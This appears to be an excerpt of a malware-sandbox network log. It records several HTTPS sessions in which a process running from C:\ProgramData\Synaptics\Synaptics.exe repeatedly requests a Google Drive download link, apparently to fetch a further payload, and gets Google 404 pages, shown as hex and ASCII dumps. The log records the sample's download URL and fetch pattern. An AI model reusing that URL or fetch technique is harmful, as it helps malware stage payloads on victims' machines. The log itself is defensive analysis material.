                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC34INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                                                          Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC34INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          11192.168.2.349752172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC34OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC34INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:21 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-owSLexwcwI23LgFNuhQtcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC36INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 6e 66 69 49 67 34 52 36 55 5f 4d 31 64 77 4c 54 77 37 46 79 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9nfiIg4R6U_M1dwLTw7FyQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC37INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                                                          Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC37INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          12192.168.2.349753172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC34OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC37INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:21 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-wx2waV2Lj-f-ALhfHunfqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC39INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 4f 48 50 6a 66 36 79 39 4e 59 33 48 56 56 2d 70 62 67 69 55 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2OHPjf6y9NY3HVV-pbgiUg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC40INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                                                          Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC40INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          13192.168.2.349754172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC37OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC41INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:21 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-tyf8AIDhJKLFOFMri0-Uwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC42INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 7a 66 45 58 57 41 70 55 61 49 79 32 6f 6e 6b 4b 51 6f 4c 54 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BzfEXWApUaIy2onkKQoLTQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC44INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                                                          Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC44INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          14192.168.2.349756172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC40OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC44INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:21 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-HRWE88d19AAGun80LpdvkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC45INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC45INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 36 75 51 56 5f 44 46 75 54 7a 36 39 76 6e 4b 50 4f 4b 6f 52 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                                                          Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="V6uQV_DFuTz69vnKPOKoRg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC46INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                                                          Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC47INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          15192.168.2.349759172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC44OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC47INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:22 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-Mcne5Xx0myz3cvt4Cyy1nw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC48INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 4b 44 34 38 37 30 38 48 55 6a 66 63 32 78 41 62 73 6f 55 39 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XKD48708HUjfc2xAbsoU9A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC50INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                                                          Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC50INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
